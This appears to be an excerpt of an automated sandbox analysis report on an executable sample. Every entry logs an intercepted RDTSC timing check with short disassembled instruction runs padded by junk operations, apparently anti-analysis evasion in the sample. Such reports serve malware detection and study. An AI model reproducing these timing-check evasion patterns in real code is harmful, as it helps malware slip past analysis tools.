                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3EBB87 second address: 3EBB8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3EBB8D second address: 3EBB9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F3A94CD407Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3EBE41 second address: 3EBE47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3EBE47 second address: 3EBE61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F3A94CD4085h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3EBE61 second address: 3EBE66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3EC15C second address: 3EC178 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD4080h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3EC178 second address: 3EC17C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3EC17C second address: 3EC180 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3EC4A7 second address: 3EC4B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3EC4B1 second address: 3EC4B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3EC4B5 second address: 3EC4B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3EC607 second address: 3EC615 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F3A94CD4076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3EC615 second address: 3EC619 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 332D00 second address: 332D0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F3A94CD4076h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 332D0A second address: 332D0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3ECF25 second address: 3ECF2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3ECF2B second address: 3ECF32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3ECF32 second address: 3ECF4A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD4083h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3ECF4A second address: 3ECF54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3ED6FF second address: 3ED70A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3F62C9 second address: 3F62DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007F3A9502B5E6h 0x0000000c jnl 00007F3A9502B5E6h 0x00000012 popad 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3F62DC second address: 3F6308 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F3A94CD407Ch 0x00000008 push edx 0x00000009 jo 00007F3A94CD4076h 0x0000000f pushad 0x00000010 popad 0x00000011 pop edx 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push edx 0x00000015 jmp 00007F3A94CD407Eh 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3F5E7A second address: 3F5E86 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F3A9502B5EEh 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 402085 second address: 402089 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 402089 second address: 4020A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3A9502B5EAh 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007F3A9502B5E6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4020A4 second address: 4020A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 401C0F second address: 401C15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 401C15 second address: 401C19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 401C19 second address: 401C1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 401C1D second address: 401C23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 401C23 second address: 401C55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F3A9502B5F9h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F3A9502B5EFh 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 401C55 second address: 401C5B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 401DC5 second address: 401DCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 401DCB second address: 401DCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 40430F second address: 404323 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5F0h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 404323 second address: 404329 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 408069 second address: 40806F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4081D4 second address: 4081D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4081D8 second address: 4081ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jp 00007F3A9502B5E8h 0x0000000e pushad 0x0000000f popad 0x00000010 push ebx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 412DB7 second address: 412DC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F3A94CD407Ch 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 412DC9 second address: 412DD2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 412C1D second address: 412C21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 415100 second address: 415111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F3A9502B5ECh 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4182A9 second address: 4182AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4182AD second address: 4182B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4182B1 second address: 4182B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4182B7 second address: 4182C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4182C2 second address: 4182C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4182C7 second address: 4182DF instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3A9502B5F2h 0x00000008 jp 00007F3A9502B5E6h 0x0000000e jne 00007F3A9502B5E6h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4182DF second address: 4182E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 41A00F second address: 41A013 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 41A013 second address: 41A017 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 41A017 second address: 41A022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 41A022 second address: 41A046 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3A94CD407Fh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d jmp 00007F3A94CD407Ah 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pop eax 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 41A046 second address: 41A079 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5F8h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F3A9502B5F5h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 41A079 second address: 41A07D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 41DF17 second address: 41DF29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007F3A9502B5E6h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 41DF29 second address: 41DF37 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3A94CD4076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 41F68C second address: 41F6BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3A9502B5F5h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 js 00007F3A9502B5E6h 0x00000016 jmp 00007F3A9502B5EDh 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 41F6BF second address: 41F6E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F3A94CD4086h 0x0000000c jbe 00007F3A94CD4076h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 42507F second address: 42508B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F3A9502B5E6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 42508B second address: 42509D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c jng 00007F3A94CD4076h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 423D14 second address: 423D2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007F3A9502B5E6h 0x00000010 jng 00007F3A9502B5E6h 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 423D2A second address: 423D49 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F3A94CD407Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jl 00007F3A94CD4076h 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 423D49 second address: 423D53 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F3A9502B5E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 423D53 second address: 423D5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 423E90 second address: 423EA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 js 00007F3A9502B5E6h 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pop esi 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 424DE6 second address: 424DF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F3A94CD4076h 0x0000000a popad 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 429649 second address: 429650 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 436C7C second address: 436C82 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 436C82 second address: 436CA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3A9502B5ECh 0x00000008 push eax 0x00000009 pop eax 0x0000000a jng 00007F3A9502B5E6h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 js 00007F3A9502B5E6h 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 436CA2 second address: 436CA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 436CA6 second address: 436CB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007F3A9502B5E6h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 436CB7 second address: 436CD8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD4088h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 436CD8 second address: 436CE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 43D22C second address: 43D232 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 43D232 second address: 43D243 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jmp 00007F3A9502B5EAh 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 43D243 second address: 43D248 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 43D248 second address: 43D250 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 441A41 second address: 441A71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD4089h 0x00000007 jmp 00007F3A94CD4080h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 441A71 second address: 441A7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 441A7B second address: 441A81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 44DA90 second address: 44DA94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 44DA94 second address: 44DA9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4680AF second address: 4680B4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4680B4 second address: 4680BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 4680BC second address: 4680E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edi 0x00000008 jne 00007F3A9502B5ECh 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F3A9502B5EEh 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 468273 second address: 468279 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 468279 second address: 468283 instructions: 0x00000000 rdtsc 0x00000002 je 00007F3A9502B5ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 468ED8 second address: 468F00 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F3A94CD407Eh 0x00000008 jmp 00007F3A94CD407Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jo 00007F3A94CD407Eh 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 46BAB0 second address: 46BAB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 46BBA4 second address: 46BBAA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 46BD60 second address: 46BD64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 46C119 second address: 46C123 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F3A94CD4076h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 46C123 second address: 46C127 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 470B0E second address: 470B16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 470B16 second address: 470B29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007F3A9502B5E6h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
